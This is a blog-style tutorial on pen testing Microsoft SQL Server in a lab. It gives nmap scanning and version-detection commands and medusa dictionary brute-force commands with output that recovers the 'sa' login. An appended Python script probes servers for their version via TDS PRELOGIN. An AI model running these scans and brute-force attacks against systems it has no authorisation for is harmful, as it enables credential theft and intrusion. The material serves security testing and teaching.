Pen test and hack microsoft sql server (mssql)

All the information I'm about to go over is nothing new; I'm just trying to organize all my notes on pen testing mssql. Hopefully my notes will help others. All the commands and instructions are Linux based, so keep that in mind.

The first thing you'll need to do is discover IP addresses that have mssql running, so you'll accomplish this by running some type of scan. The scanner of choice is always nmap, but there are some things you'll need to consider when scanning for mssql. The default port for a default mssql instance is TCP 1433 (named instances pick a dynamic port at startup, which is why the browser service discussed below matters), so for starters it's definitely a good idea to scan an IP range looking for port 1433.

Step 1: scan for port 1433. This only scans for port 1433 (nmap -p 1433 <ip range>); the IP range will vary. My output is below. The hosts in my lab are on 192.168.1.x; the last octet did not survive in this copy of the post.

Starting Nmap 5.51BETA1 ( http://nmap.org ) at ... EST
Nmap scan report for 192.168.1.x
Host is up (0.00s latency).
PORT     STATE SERVICE
Nmap scan report for 192.168.1.x
Host is up (0.00s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
MAC Address: 00:0C:29:4C:3E:xx (VMware)
Nmap done: ... IP addresses (2 hosts up) scanned in ... seconds

The first host came back without 1433 open; in this case the second host, 192.168.1.x, is the one with 1433/tcp open.

So great success, we've found a box running mssql. Hold your horses, because this is simply the beginning. If your scanning is focused, meaning I'm not scanning thousands of hosts, only a handful, then this type of scan is fine. If I'm only concerned about a handful of hosts, then my next step would be to determine two things: the version of the database, and whether there are any other additional listening ports for this database.

To determine the version of the database we can once again turn to nmap: nmap -A -p 1433 192.168.1.x. The -A option turns on version detection, OS detection, script scanning and traceroute, so it will try to determine as much as it can about the service on port 1433 and about the underlying OS as well. Below is the output from this scan.

Starting Nmap 5.51BETA1 ( http://nmap.org ) at ... EST
Nmap scan report for 192.168.1.x
Host is up (0.00s latency).
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM
MAC Address: 00:0C:29:4C:3E:xx (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop

Host script results:
| ms-sql-info:
|   Windows server name: WIN2...
|   [192.168.1.x\MSSQLSERVER]
|     Instance name: MSSQLSERVER
|     Version: Microsoft SQL Server 2005 RTM
|       Version number: 9.00.1399.00
|       Product: Microsoft SQL Server 2005
|       Service pack level: RTM
|       Post-SP patches applied: No
|     TCP port: 1433
|     Named pipe: \\192.168.1.x\pipe\sql\query
|_    Clustered: No

So you'll notice in the output nmap is reporting the version of mssql to be SQL Server 2005 RTM, which is correct in this case. Knowing the version is very important, because different versions of SQL Server provide different security features and also have different vulnerabilities. There are other ways of determining the version of SQL Server without authenticating (the version is handed out in the TDS pre-login exchange before any credentials are sent, and by the browser service on UDP 1434), but to me nmap is the best solution.

Next let's talk about looking for other ports that mssql may be listening on. For multiple reasons, such as several instances on one host or a deliberately non-default port, mssql can listen on multiple ports. When pen testing mssql we want to know what those ports are so we can bang against them. Depending on the configuration you can authenticate to every listening mssql port.

One thing to keep in mind is that you can authenticate to mssql using your normal Windows / network / Active Directory credentials, or using a login that was set up inside the SQL Server itself. These are known as Windows authentication and SQL Server authentication. The database administrator chooses one of two server-wide modes when setting up the instance: Windows authentication only, or mixed mode, which allows both; SQL logins such as sa only work in mixed mode. The easier target is SQL logins, as those are typically configured with a weaker password policy (for SQL logins, Windows password policy and lockout enforcement is optional and set per login). Now that I've discussed some of the issues, let's get cracking.

To determine additional ports that a database may be running on we'll once again turn to nmap. This time I told mssql to also listen on a second, non-default port. So now go ahead and run the same nmap command as before: nmap -A -p 1433 192.168.1.x.

Starting Nmap 5.51BETA1 ( http://nmap.org ) at ... EST
Nmap scan report for 192.168.1.x
Host is up (0.00s latency).
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM
MAC Address: 00:0C:29:4C:3E:xx (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Service Info: OS: Windows

Host script results:
| ms-sql-info:
|   Windows server name: WIN2...
|   [192.168.1.x\MSSQLSERVER]
|     Instance name: MSSQLSERVER
|     Version: Microsoft SQL Server 2005 RTM
|       Version number: 9.00.1399.00
|       Product: Microsoft SQL Server 2005
|       Service pack level: RTM
|       Post-SP patches applied: No
|     TCP port: 1433
|     Named pipe: \\192.168.1.x\pipe\sql\query
|     Clustered: No
|   [192.168.1.x:<second port>]
|     Version: Microsoft SQL Server 2005 RTM
|       Version number: 9.00.1399.00
|       Product: Microsoft SQL Server 2005
|       Service pack level: RTM
|       Post-SP patches applied: No
|_    TCP port: <second port>

So we see that nmap reports back port 1433 and the second port, even though we only asked it to scan 1433. You may be wondering how nmap knew about the second port. MSSQL runs a service called the SQL Server Browser service, which listens on port 1434, UDP instead of TCP, and answers a one-byte query with the list of instances on the host and the TCP port each one listens on. If this browser service wasn't running, nmap wouldn't be able to pull this information. Basically nmap queries UDP 1434 using its ms-sql-info script and the mssql library behind it. There are a couple of other tools that do the same thing, but I stick with nmap since it's already baked in. So the browser service and additional ports are very important to keep in mind when pen testing mssql. If your port scan isn't finding 1433 but the host is a SQL box, scanning UDP 1434 (nmap -sU -p 1434) is the next thing to try.

Now we have more information about our target, which hopefully means we'll find a weak spot that we can exploit. Once you know the version it's always recommended to search CVE (Common Vulnerabilities and Exposures), and it may also not be a bad idea to search inside the Metasploit tool as well. There aren't a whole lot of remote code execution vulnerabilities for anything SQL Server 2005 or newer; the famous pre-authentication bugs (MS02-039, the one Slammer used) were against SQL Server 2000. So if they aren't running an old unpatched version of mssql, then that means you'll need credentials to authenticate to the SQL server. This means we'll need to try and brute force the credentials.

The main tool I like to use to perform brute force attacks is medusa; another good alternative is hydra. I have had different degrees of luck with both tools, so it may be useful to run both, although my default is medusa. I will only cover how to use medusa. Below is the typical command line that you feed into medusa:

medusa -h 192.168.1.x -U dictionary.txt -P dictionary.txt -O medusaOutput -M mssql
The -h is the host, the -U is the username list, -P is the password list, -O is the output file, and -M is the module you want to run, in this case mssql. Below is the output of this command.

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: password (2 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: sa (3 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: password (2 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: sa (3 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: sa (3 of 3, 2 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: sa (3 of 3, 2 complete) Password: password (2 of 3 complete)
ACCOUNT FOUND: [mssql] Host: 192.168.1.x User: sa Password: password [SUCCESS]

Your output file will resemble the following.

# Medusa v.2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
# medusa -h 192.168.1.x -U dictionary.txt -P dictionary.txt -O medusaOutput -M mssql
ACCOUNT FOUND: [mssql] Host: 192.168.1.x User: sa Password: password [SUCCESS]
# Medusa has finished (...)

The file output is much easier to parse, and we can see in the next to last line that it was successful in finding the credentials username = sa and password = password.

By default medusa will run against the standard port, which is 1433. To run it against the second port we found, add -n with the port number:

medusa -h 192.168.1.x -U dictionary.txt -P dictionary.txt -O medusaOutput -M mssql -n <second port>

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: password (2 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: admin (1 of 3, 0 complete) Password: sa (3 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: password (2 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: password (2 of 3, 1 complete) Password: sa (3 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: sa (3 of 3, 2 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [mssql] Host: 192.168.1.x (1 of 1, 0 complete) User: sa (3 of 3, 2 complete) Password: password (2 of 3 complete)
ACCOUNT FOUND: [mssql] Host: 192.168.1.x User: sa Password: password [SUCCESS]

So you see that medusa was able to authenticate to the second port with the same credentials. This may not always be the case: here both ports belong to one instance, but separate instances on the same host each have their own set of logins and their own port, so it's always best to run a brute force tool like medusa against each individual port and see if you get any hits.

Two things to keep in mind while brute forcing. First, by default SQL Server logs every failed login (error 18456, in the SQL Server error log and the Windows application log), so a dictionary run is very noisy, and a SQL login created with CHECK_POLICY on can be locked out by the Windows lockout policy, sa included. Second, medusa and hydra can take a while to run; in my case I had a very small dictionary, the three entries (admin, password, sa) you can see in the output above. Large dictionaries can take some time, so keep that in mind when you're brute forcing with these kinds of tools.

So we got lucky and we have credentials for a mssql database. That's awesome, but it's just another step in the process. Going forward we have a couple of options. As a true attacker you would consider the following:

1. Plunder the database for information.
2. Use your credentials to gain further access (e.g. ...).
3. Start serving up malware for potential victims.

I'm not going to touch on the third option, but I will discuss the first and second options.
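The version that nmap prints for each TCP port comes from the TDS PRELOGIN exchange, which every SQL Server answers before any login is attempted, so it is a way to fingerprint a port even when the browser service is blocked. The following is an added example for this page, not code from the original post or from nmap or Microsoft: it builds a minimal PRELOGIN packet, sends it to a port, and decodes the VERSION and ENCRYPTION options from the reply. The embedded sample reply (9.00.1399, encryption not supported) is constructed to match the SQL Server 2005 RTM box in the post; the packet layout follows the MS-TDS specification.

```python
"""Grab the SQL Server version without credentials via a TDS PRELOGIN packet.
Added example; not from the post, nmap or Microsoft."""
import socket
import struct

TDS_PRELOGIN = 0x12          # packet type of our request
TDS_TABULAR = 0x04           # packet type of the server's reply
OPT_VERSION, OPT_ENCRYPTION, OPT_INSTOPT, OPT_THREADID, OPT_MARS = 0, 1, 2, 3, 4
OPT_TERMINATOR = 0xFF
ENCRYPTION = {0: "ENCRYPT_OFF", 1: "ENCRYPT_ON", 2: "ENCRYPT_NOT_SUP", 3: "ENCRYPT_REQ"}


def encode_prelogin(options: list[tuple[int, bytes]]) -> bytes:
    """PRELOGIN payload: table of (token, offset, length), 0xFF, then the data."""
    table, data = b"", b""
    offset = 5 * len(options) + 1            # data starts right after the terminator
    for token, value in options:
        table += struct.pack(">BHH", token, offset, len(value))
        data += value
        offset += len(value)
    return table + bytes([OPT_TERMINATOR]) + data


def tds_packet(payload: bytes, ptype: int = TDS_PRELOGIN) -> bytes:
    """8-byte TDS header (big-endian): type, status 0x01 = end of message,
    total length including the header, SPID 0, packet id 1, window 0."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload


def build_prelogin_request() -> bytes:
    return tds_packet(encode_prelogin([
        (OPT_VERSION, bytes(6)),             # our own version; irrelevant for a probe
        (OPT_ENCRYPTION, b"\x02"),           # ENCRYPT_NOT_SUP: we never log in
        (OPT_INSTOPT, b"\x00"),
        (OPT_THREADID, bytes(4)),
        (OPT_MARS, b"\x00"),
    ]))


def parse_prelogin_reply(payload: bytes) -> dict:
    """Walk the option table of a PRELOGIN reply; decode VERSION and ENCRYPTION."""
    opts, pos = {}, 0
    while pos + 5 <= len(payload) and payload[pos] != OPT_TERMINATOR:
        token, off, ln = struct.unpack_from(">BHH", payload, pos)
        opts[token] = payload[off:off + ln]
        pos += 5
    ver = opts.get(OPT_VERSION, b"")
    if len(ver) < 6:
        raise ValueError("reply carries no VERSION option")
    # VERSION data: major (1), minor (1), build (2, big-endian), sub-build (2)
    major, minor, build, subbuild = struct.unpack(">BBHH", ver[:6])
    enc = opts.get(OPT_ENCRYPTION, b"\x00")[0]
    return {"version": f"{major}.{minor:02d}.{build}.{subbuild:02d}",
            "encryption": ENCRYPTION.get(enc, hex(enc))}


def probe(host: str, port: int = 1433, timeout: float = 5.0) -> dict:
    """Connect, send PRELOGIN, parse the reply (network use)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_prelogin_request())
        reply = s.recv(4096)
    if len(reply) < 8 or reply[0] != TDS_TABULAR:
        raise ValueError("unexpected TDS packet type %r" % reply[:1])
    return parse_prelogin_reply(reply[8:])


# Constructed reply, as a SQL Server 2005 RTM box (9.00.1399) that does not
# support encryption would send it: VERSION = 09 00 05 77 00 00, ENCRYPTION = 02.
SAMPLE_REPLY = tds_packet(encode_prelogin([
    (OPT_VERSION, bytes([9, 0, 0x05, 0x77, 0, 0])),
    (OPT_ENCRYPTION, b"\x02"),
]), TDS_TABULAR)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:     # python3 tds_prelogin.py <host> [port]
        info = probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 1433)
    else:                     # offline: decode the constructed sample
        info = parse_prelogin_reply(SAMPLE_REPLY[8:])
    print(info)
```

Run it once per port that the browser service (or your port scan) turned up. The version string comes back in nmap's 9.00.1399.00 style, so it can be matched directly against a build list. The ENCRYPTION byte is worth keeping: a server answering ENCRYPT_REQ still hands over its version here, but any login attempt, medusa's included, has to negotiate TLS right after this exchange, so a brute-force module that cannot do that will fail on every password rather than on the wrong ones.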